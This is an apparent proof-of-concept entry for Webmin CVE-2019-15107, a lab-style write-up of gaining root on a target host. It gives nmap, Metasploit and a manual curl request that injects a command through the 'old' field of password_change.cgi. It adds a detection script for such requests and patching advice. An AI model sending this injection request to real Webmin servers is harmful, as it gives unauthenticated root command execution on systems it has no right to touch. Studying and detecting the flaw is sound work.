POC details: c80c381b7c6bbc5a84282fbc8214e6dddede9f22

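Source
Related vulnerability
Title: Webmin OS command injection vulnerability (CVE-2019-15107)
Description: Webmin is a web-based system administration tool for Unix-like operating systems. password_change.cgi in Webmin 1.920 and earlier contains an OS command injection vulnerability. The vulnerability arises because the network system or product does not properly filter special elements when an executable command is constructed from externally supplied input. An attacker can exploit it to execute unauthorized commands.
Description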
Research Objective: To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.
Introduction

Methodology:

Initial Reconnaissance:

Network scanning performed using Nmap:

```bash
nmap -sV -sC -A -p- 10.201.105.185
```

Identified Webmin 1.890 service running on port 10000

Vulnerability Analysis:

Investigated the vulnerability mechanism in password_change.cgi

Confirmed the possibility of unauthenticated arbitrary command execution

Exploitation:

Implemented two attack vectors:

Using Metasploit Framework:

```bash
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit
```

Manual exploitation via curl:

```bash
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
```

Post-Exploitation:

Obtained interactive root shell

Conducted filesystem analysis

Discovered flag files:

```bash
/home/dark/user.txt
/root/root.txt
```

Findings:

Successfully exploited CVE-2019-15107 vulnerability

Gained complete root privileges on the system

Demonstrated critical importance of timely software updates

Technical Conclusions:

Vulnerability allows arbitrary command execution via "old" parameter injection

Lack of authentication checks makes this particularly dangerous

Version 1.890 contains a backdoor patched in later releases

Security Recommendations:

Immediate upgrade to current Webmin version

Restrict management panel access by IP

Regular security audits of web applications
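
A triage check for the request shape shown in the curl command above, added here as an example and not part of the original README: it URL-decodes every form field of a POST to password_change.cgi and reports the fields that carry shell metacharacters. The record layout (`src`, `method`, `path`, `body`) and the sample records are constructed assumptions, standing in for an export from a reverse proxy or WAF that logs request bodies.

```python
import re
from urllib.parse import parse_qs

TARGET_PATH = "/password_change.cgi"

# Characters that let a form value break out into a shell command line.
SHELL_META = re.compile(r"[|;&`\n]|\$\(")


def suspicious_fields(body: str) -> list[str]:
    """Names of form fields whose URL-decoded value contains shell metacharacters."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes %7C, %3B, + ...
    return sorted(
        name for name, values in fields.items()
        if any(SHELL_META.search(v) for v in values)
    )


def triage(records):
    """Yield (source_ip, field_names) for risky POSTs to password_change.cgi."""
    for rec in records:
        if rec["method"].upper() != "POST":
            continue
        if rec["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        hits = suspicious_fields(rec["body"])
        if hits:
            yield rec["src"], hits


# Constructed sample records (documentation IP ranges), not real traffic.
SAMPLE = [
    {"src": "203.0.113.7", "method": "POST", "path": "/password_change.cgi",
     "body": "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"},
    {"src": "198.51.100.4", "method": "POST", "path": "/password_change.cgi",
     "body": "user=alice&pam=&expired=2&old=test%7Cid&new1=a&new2=a"},
    {"src": "192.0.2.10", "method": "POST", "path": "/password_change.cgi",
     "body": "user=bob&pam=&expired=2&old=Winter2019&new1=Spring2020&new2=Spring2020"},
    {"src": "192.0.2.10", "method": "GET", "path": "/session_login.cgi", "body": ""},
]

if __name__ == "__main__":
    for src, fields in triage(SAMPLE):
        print(f"review: {src} sent shell metacharacters in {fields}")
```

Passwords can legitimately contain characters such as `|` or `;`, so a hit is a prompt to review the request and the host, not proof of exploitation.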

Further Research Directions:

Analysis of other Webmin vulnerabilities

Development of custom exploit without Metasploit

Investigation of persistence techniques in compromised systems

This case study demonstrates the critical importance of timely system updates and the necessity for continuous vulnerability monitoring in deployed software. The research provides practical insights into modern web application exploitation techniques while emphasizing fundamental security principles.
File snapshot

[4.0K] /data/pocs/c80c381b7c6bbc5a84282fbc8214e6dddede9f22
├── [227K] 1.jpeg
├── [ 71K] 2.jpeg
├── [149K] 3.jpeg
├── [176K] 4.jpeg
├── [179K] 5.jpeg
├── [157K] 6.jpeg
└── [2.0K] README.md

0 directories, 7 files